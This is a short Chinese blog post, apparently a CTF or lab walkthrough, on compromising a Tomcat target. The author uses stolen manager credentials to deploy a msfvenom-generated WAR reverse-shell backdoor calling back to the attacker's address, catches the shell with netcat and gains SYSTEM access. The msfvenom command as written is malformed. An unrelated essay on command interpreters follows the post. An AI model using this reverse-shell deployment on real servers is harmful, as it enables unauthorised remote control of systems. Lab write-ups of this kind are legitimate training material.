另一种方法

上一次
拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录

这里显示能上传一个.war文件,我用msfvenom生成一个war的后门

msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545

payload.war

这次不用metasploit,改用netcat侦听4545端口

然后将生成的payload.war用jar分离出.jsp
文件:
jar -xvf payload.war


将payload.war上传到靶机,运行
deploy,网页跳转,
访问
http://192.168.0.104:8282/payload/cugxcageiouu.jsp来激活payload

nc侦听那边已经显示拿到shell了,whoami查一下,还是system权限



所以可以来猎杀那些flag了

不过nc的shell远不如meterpreter方便

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一种方法是在命令解释器中包含执行命令所需的代码,这种方法有以下优点: 1. 简单易用:用户只需要输入命令,命令解释器就会自动执行对应的代码,无需额外学习和了解命令的实现细节。 2. 灵活性高:由于执行命令的代码被封装在命令解释器中,因此可以很方便地对其进行修改和扩展。 3. 效率较高:由于执行命令的代码直接嵌入在命令解释器中,因此可以减少系统调用的次数,提高程序的执行效率。 但这种方法也有以下缺点: 1. 维护成本高:由于命令解释器中包含了大量的执行命令的代码,因此需要花费较多的时间和精力来维护和更新这些代码。 2. 安全性差:由于命令解释器可以执行任意的代码,因此存在被恶意利用的风险。 另一种方法是通过系统程序实现命令,这种方法有以下优点: 1. 安全性高:由于系统程序的代码被固定在了系统中,无法被用户篡改,因此具有较高的安全性。 2. 维护成本低:由于系统程序的代码是固定的,因此只需要在必要时进行更新,维护成本较低。 但这种方法也有以下缺点: 1. 学习成本高:由于用户需要了解系统程序的使用方法,因此需要投入较多的时间和精力来学习。 2. 灵活性低:由于系统程序的代码是固定的,因此无法随意修改和扩展。 综上所述,两种不同的方式各有优缺点,具体选择应根据实际情况来考虑。如果需要灵活性高、效率高的命令解释器,则可以选择第一种方法;如果需要安全性高、维护成本低的命令解释器,则可以选择第二种方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值